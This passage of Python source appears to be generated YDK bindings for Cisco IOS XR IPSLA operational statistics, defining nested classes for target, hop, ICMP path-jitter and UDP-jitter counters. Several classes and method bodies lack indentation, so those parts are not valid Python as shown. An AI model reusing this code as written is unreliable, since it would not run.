    self._children_yang_names.add("latest")
    self.aggregated = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated()
    self.aggregated.parent = self
    self._children_name_map["aggregated"] = "aggregated"
    self._children_yang_names.add("aggregated")
    # Path segment contributed by this node when building the data path.
    self._segment_path = lambda: "statistics"
class Latest(Entity):
"""
Statistics collected during the last
sampling cycle of the operation
.. attribute:: target
Latest statistics for the target node
**type**\: :py:class:`Target <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target>`
.. attribute:: hops
Latest statistics for hops in a path\-enabled operation
**type**\: :py:class:`Hops <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops>`
.. attribute:: lpd_paths
List of latest LPD paths
**type**\: :py:class:`LpdPaths <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    # Registers and instantiates the three child containers of the
    # 'latest' statistics node: target, hops, and lpd-paths.
    super(Ipsla.OperationData.Operations.Operation.Statistics.Latest, self).__init__()
    self.yang_name = "latest"
    self.yang_parent_name = "statistics"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child container registry: YANG element name -> (python attr, class).
    self._child_container_classes = OrderedDict([("target", ("target", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target)), ("hops", ("hops", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops)), ("lpd-paths", ("lpd_paths", Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict()
    self.target = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target()
    self.target.parent = self
    self._children_name_map["target"] = "target"
    self._children_yang_names.add("target")
    self.hops = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops()
    self.hops.parent = self
    self._children_name_map["hops"] = "hops"
    self._children_yang_names.add("hops")
    self.lpd_paths = Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths()
    self.lpd_paths.parent = self
    self._children_name_map["lpd_paths"] = "lpd-paths"
    self._children_yang_names.add("lpd-paths")
    self._segment_path = lambda: "latest"
class Target(Entity):
"""
Latest statistics for the target node
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    # Registers and instantiates the 'common-stats' and 'specific-stats'
    # child containers for the latest target-node statistics.
    super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target, self).__init__()
    self.yang_name = "target"
    self.yang_parent_name = "latest"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child container registry: YANG element name -> (python attr, class).
    self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict()
    self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.CommonStats()
    self.common_stats.parent = self
    self._children_name_map["common_stats"] = "common-stats"
    self._children_yang_names.add("common-stats")
    self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats()
    self.specific_stats.parent = self
    self._children_name_map["specific_stats"] = "specific-stats"
    self._children_yang_names.add("specific-stats")
    self._segment_path = lambda: "target"
class CommonStats(Entity):
    """
    Common Stats
    .. attribute:: operation_time
    Operation Time
    **type**\: int
    **range:** 0..18446744073709551615
    .. attribute:: return_code
    Return code
    **type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
    .. attribute:: response_time_count
    Number of RTT samples used for the statistics
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: response_time
    RTT
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: min_response_time
    Minimum RTT
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: max_response_time
    Maximum RTT
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: sum_response_time
    Sum of RTT
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: sum2_response_time
    Sum of RTT^2
    **type**\: int
    **range:** 0..18446744073709551615
    .. attribute:: update_count
    Number of updates processed
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: ok_count
    Number of updates with Okay return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: disconnect_count
    Number of updates with Disconnected return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: timeout_count
    Number of updates with Timeout return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: busy_count
    Number of updates with Busy return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: no_connection_count
    Number of updates with NotConnected return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: dropped_count
    Number of updates with Dropped return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: internal_error_count
    Number of updates with InternalError return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: sequence_error_count
    Number of updates with SeqError return code
    **type**\: int
    **range:** 0..4294967295
    .. attribute:: verify_error_count
    Number of updates with VerifyError return code
    **type**\: int
    **range:** 0..4294967295
    """

    # YANG module prefix and revision of the model this binding was generated from.
    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.CommonStats, self).__init__()
        self.yang_name = "common-stats"
        self.yang_parent_name = "target"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Leaf-only container: no nested containers or YANG lists.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])
        # Leaf registry: python attribute name -> YLeaf(YANG type, YANG leaf name).
        self._leafs = OrderedDict([
            ('operation_time', YLeaf(YType.uint64, 'operation-time')),
            ('return_code', YLeaf(YType.enumeration, 'return-code')),
            ('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
            ('response_time', YLeaf(YType.uint32, 'response-time')),
            ('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
            ('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
            ('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
            ('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
            ('update_count', YLeaf(YType.uint32, 'update-count')),
            ('ok_count', YLeaf(YType.uint32, 'ok-count')),
            ('disconnect_count', YLeaf(YType.uint32, 'disconnect-count')),
            ('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
            ('busy_count', YLeaf(YType.uint32, 'busy-count')),
            ('no_connection_count', YLeaf(YType.uint32, 'no-connection-count')),
            ('dropped_count', YLeaf(YType.uint32, 'dropped-count')),
            ('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
            ('sequence_error_count', YLeaf(YType.uint32, 'sequence-error-count')),
            ('verify_error_count', YLeaf(YType.uint32, 'verify-error-count')),
        ])
        self.operation_time = None
        self.return_code = None
        self.response_time_count = None
        self.response_time = None
        self.min_response_time = None
        self.max_response_time = None
        self.sum_response_time = None
        self.sum2_response_time = None
        self.update_count = None
        self.ok_count = None
        self.disconnect_count = None
        self.timeout_count = None
        self.busy_count = None
        self.no_connection_count = None
        self.dropped_count = None
        self.internal_error_count = None
        self.sequence_error_count = None
        self.verify_error_count = None
        self._segment_path = lambda: "common-stats"

    def __setattr__(self, name, value):
        # Route writes through Entity._perform_setattr with this class's leaf names.
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
"""
Operation Specific Stats
.. attribute:: icmp_path_jitter_stats
icmp path jitter stats
**type**\: :py:class:`IcmpPathJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.IcmpPathJitterStats>`
.. attribute:: udp_jitter_stats
udp jitter stats
**type**\: :py:class:`UdpJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.UdpJitterStats>`
.. attribute:: op_type
op type
**type**\: :py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
    # Registers the per-operation-type stats containers (icmp-path-jitter
    # and udp-jitter) plus the 'op-type' discriminator leaf.
    super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats, self).__init__()
    self.yang_name = "specific-stats"
    self.yang_parent_name = "target"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child container registry: YANG element name -> (python attr, class).
    self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.UdpJitterStats))])
    self._child_list_classes = OrderedDict([])
    self._leafs = OrderedDict([
        ('op_type', YLeaf(YType.enumeration, 'op-type')),
    ])
    self.op_type = None
    self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.IcmpPathJitterStats()
    self.icmp_path_jitter_stats.parent = self
    self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
    self._children_yang_names.add("icmp-path-jitter-stats")
    self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.UdpJitterStats()
    self.udp_jitter_stats.parent = self
    self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
    self._children_yang_names.add("udp-jitter-stats")
    self._segment_path = lambda: "specific-stats"
def __setattr__(self, name, value):
    # Delegate attribute assignment to Entity._perform_setattr with this
    # class and its single leaf name ('op_type').
    self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats, ['op_type'], name, value)
class IcmpPathJitterStats(Entity):
"""
icmp path jitter stats
.. attribute:: source_address
IP Address of the source
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: dest_address
IP Address of the destination
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: hop_address
IP address of the hop in the path
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: packet_interval
Interval between echos in ms
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packet_count
Number of Echo replies received
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_count
Number of packets lost
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sequence_count
Number of out of sequence packets
**type**\: int
**range:** 0..4294967295
.. attribute:: discarded_sample_count
Number of discarded samples
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_errors_count
Number of packets with data corruption
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_error_count
Number of packets dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter
Jitter value for this node in the path
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum
Sum of positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum2
Sum of squares of positive jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pos_jitter_min
Minimum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_max
Maximum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_count
Number of positive jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum
Sum of negative jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_min
Minimum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_max
Maximum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum2
Sum of squares of negative jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: neg_jitter_count
Number of negative jitter values
**type**\: int
**range:** 0..4294967295
"""
# YANG module metadata for this node.
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
"""Build the icmp-path-jitter-stats leaf container with every leaf unset."""
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.IcmpPathJitterStats, self).__init__()
self.yang_name = "icmp-path-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Pure leaf container: no child containers and no child lists.
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
# Python leaf name -> YLeaf descriptor, in YANG order.  Addresses are
# strings, the *sum2 (sum-of-squares) leaves are uint64, the rest uint32.
self._leafs = OrderedDict([
('source_address', YLeaf(YType.str, 'source-address')),
('dest_address', YLeaf(YType.str, 'dest-address')),
('hop_address', YLeaf(YType.str, 'hop-address')),
('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('packet_count', YLeaf(YType.uint32, 'packet-count')),
('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
('jitter', YLeaf(YType.uint32, 'jitter')),
('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
])
# Leaves start out unset.  Note each assignment is routed through the
# __setattr__ hook below (and ydk's _perform_setattr) — this is why
# _leafs must already be populated at this point.
self.source_address = None
self.dest_address = None
self.hop_address = None
self.packet_interval = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.packet_count = None
self.packet_loss_count = None
self.out_of_sequence_count = None
self.discarded_sample_count = None
self.verify_errors_count = None
self.dropped_error_count = None
self.jitter = None
self.pos_jitter_sum = None
self.pos_jitter_sum2 = None
self.pos_jitter_min = None
self.pos_jitter_max = None
self.pos_jitter_count = None
self.neg_jitter_sum = None
self.neg_jitter_min = None
self.neg_jitter_max = None
self.neg_jitter_sum2 = None
self.neg_jitter_count = None
# Fixed relative XPath segment for this container.
self._segment_path = lambda: "icmp-path-jitter-stats"
def __setattr__(self, name, value):
"""Delegate to ydk's generic attribute handling, restricted to this node's leaf names."""
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)
class UdpJitterStats(Entity):
    """
    udp jitter stats.

    Read-only counters for a UDP jitter probe.  Every attribute is a YANG
    leaf of this node; all are unsigned integers (uint32, except the
    ``*sum2`` sum-of-squares leaves, which are uint64):

    * ``jitter_in`` / ``jitter_out`` -- jitter moving averages computed
      as per RFC 1889.
    * ``packet_loss_sd`` / ``packet_loss_ds`` -- packets lost in the
      source-to-destination (SD) / destination-to-source (DS) direction;
      ``packet_out_of_sequence``, ``packet_mia`` (missing in action),
      ``packet_skipped``, ``packet_late_arrivals``,
      ``packet_invalid_tstamp`` -- other per-packet anomaly counters.
    * ``internal_errors_count`` / ``busies_count`` -- error tallies.
    * ``positive_*`` / ``negative_*`` (``sd``/``ds``) -- sum, sum of
      squares, min, max and count of positive/negative jitter values per
      direction, measured in milliseconds.
    * ``one_way_count`` plus ``one_way_{sd,ds}_{min,max,sum,sum2}`` --
      one-way jitter statistics (msec) per direction.
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.UdpJitterStats, self).__init__()

        self.yang_name = "udp-jitter-stats"
        self.yang_parent_name = "specific-stats"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Pure leaf container: no child containers and no child lists.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])

        # All leaves of this node, in YANG order.  The YANG identifier is
        # the Python name with underscores mapped to hyphens; the ``*sum2``
        # (sum-of-squares) leaves are 64-bit, everything else 32-bit.
        leaf_names = [
            'jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds',
            'packet_out_of_sequence', 'packet_mia', 'packet_skipped',
            'packet_late_arrivals', 'packet_invalid_tstamp',
            'internal_errors_count', 'busies_count',
            'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min',
            'positive_sd_max', 'positive_sd_count',
            'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min',
            'negative_sd_max', 'negative_sd_count',
            'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min',
            'positive_ds_max', 'positive_ds_count',
            'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min',
            'negative_ds_max', 'negative_ds_count',
            'one_way_count',
            'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum',
            'one_way_sd_sum2',
            'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum',
            'one_way_ds_sum2',
        ]
        self._leafs = OrderedDict(
            (name,
             YLeaf(YType.uint64 if name.endswith('sum2') else YType.uint32,
                   name.replace('_', '-')))
            for name in leaf_names)

        # Initialize every leaf to None, in declaration order.  Each
        # setattr call is dispatched through __setattr__ exactly as a
        # literal ``self.x = None`` statement would be.
        for name in leaf_names:
            setattr(self, name, None)

        # Fixed relative XPath segment for this container.
        self._segment_path = lambda: "udp-jitter-stats"

    def __setattr__(self, name, value):
        """Delegate to ydk's generic attribute handling, restricted to this node's leaf names."""
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class Hops(Entity):
"""
Latest statistics for hops in a
path\-enabled operation
.. attribute:: hop
Latest stats for a hop in a path\-enabled operation
**type**\: list of :py:class:`Hop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop>`
"""
# YANG module metadata for this node.
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
"""Build the hops container holding the per-hop latest-stats list."""
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops, self).__init__()
self.yang_name = "hops"
self.yang_parent_name = "latest"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
# Single child list "hop": keyed entries of the nested Hop class.
self._child_list_classes = OrderedDict([("hop", ("hop", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop))])
# This container has no leaves of its own.
self._leafs = OrderedDict()
self.hop = YList(self)
self._segment_path = lambda: "hops"
def __setattr__(self, name, value):
"""Route attribute writes through ydk's setattr hook (no leaf names to manage)."""
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops, [], name, value)
class Hop(Entity):
"""
Latest stats for a hop in a path\-enabled
operation
.. attribute:: hop_index (key)
Hop Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats>`
"""
# YANG module metadata for this node.
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
"""Build a hop list entry (keyed by hop-index) with its two stats children."""
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop, self).__init__()
self.yang_name = "hop"
self.yang_parent_name = "hops"
self.is_top_level_class = False
self.has_list_ancestor = True
# hop_index is the list key: it identifies this entry within "hops".
self.ylist_key_names = ['hop_index']
# Two child containers: aggregate common-stats plus operation-type
# specific-stats for this hop.
self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats))])
self._child_list_classes = OrderedDict([])
# Single leaf: the signed 32-bit list key.
self._leafs = OrderedDict([
('hop_index', YLeaf(YType.int32, 'hop-index')),
])
self.hop_index = None
# Instantiate and register both child containers up front.
self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.CommonStats()
self.common_stats.parent = self
self._children_name_map["common_stats"] = "common-stats"
self._children_yang_names.add("common-stats")
self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats()
self.specific_stats.parent = self
self._children_name_map["specific_stats"] = "specific-stats"
self._children_yang_names.add("specific-stats")
# List entries embed their key in the XPath segment predicate.
self._segment_path = lambda: "hop" + "[hop-index='" + str(self.hop_index) + "']"
def __setattr__(self, name, value):
"""Delegate to ydk's generic attribute handling, restricted to this node's leaf names."""
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop, ['hop_index'], name, value)
class CommonStats(Entity):
    """
    Common Stats.

    Per-hop aggregate statistics shared by all operation types: the
    64-bit operation timestamp and the return code (``IpslaRetCode``
    enumeration), round-trip-time aggregates (count, current, min, max,
    sum and 64-bit sum of squares), and per-return-code update counters
    (ok, disconnect, timeout, busy, no-connection, dropped,
    internal-error, sequence-error, verify-error).
    """

    _prefix = 'man-ipsla-oper'
    _revision = '2015-11-09'

    def __init__(self):
        super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.CommonStats, self).__init__()

        self.yang_name = "common-stats"
        self.yang_parent_name = "hop"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Pure leaf container: no child containers and no child lists.
        self._child_container_classes = OrderedDict([])
        self._child_list_classes = OrderedDict([])

        # (python name, YANG type) per leaf, in YANG order; the YANG
        # identifier is the Python name with '_' mapped to '-'.
        leaf_specs = [
            ('operation_time', YType.uint64),
            ('return_code', YType.enumeration),
            ('response_time_count', YType.uint32),
            ('response_time', YType.uint32),
            ('min_response_time', YType.uint32),
            ('max_response_time', YType.uint32),
            ('sum_response_time', YType.uint32),
            ('sum2_response_time', YType.uint64),
            ('update_count', YType.uint32),
            ('ok_count', YType.uint32),
            ('disconnect_count', YType.uint32),
            ('timeout_count', YType.uint32),
            ('busy_count', YType.uint32),
            ('no_connection_count', YType.uint32),
            ('dropped_count', YType.uint32),
            ('internal_error_count', YType.uint32),
            ('sequence_error_count', YType.uint32),
            ('verify_error_count', YType.uint32),
        ]
        self._leafs = OrderedDict(
            (name, YLeaf(ytype, name.replace('_', '-')))
            for name, ytype in leaf_specs)

        # Start every leaf out unset; the setattr calls funnel through
        # __setattr__ just like explicit ``self.x = None`` lines would.
        for name, _ in leaf_specs:
            setattr(self, name, None)

        # Fixed relative XPath segment for this container.
        self._segment_path = lambda: "common-stats"

    def __setattr__(self, name, value):
        """Delegate to ydk's generic attribute handling, restricted to this node's leaf names."""
        self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
"""
Operation Specific Stats
.. attribute:: icmp_path_jitter_stats
icmp path jitter stats
**type**\: :py:class:`IcmpPathJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.IcmpPathJitterStats>`
.. attribute:: udp_jitter_stats
udp jitter stats
**type**\: :py:class:`UdpJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.UdpJitterStats>`
.. attribute:: op_type
op type
**type**\: :py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`
"""
# YANG module metadata for this node.
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
"""Build the per-hop specific-stats container with both stat-type children."""
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats, self).__init__()
self.yang_name = "specific-stats"
self.yang_parent_name = "hop"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
# Two child containers, one per supported operation kind.  NOTE(review):
# op_type presumably indicates which child is populated for a given
# operation — confirm against the YANG model.
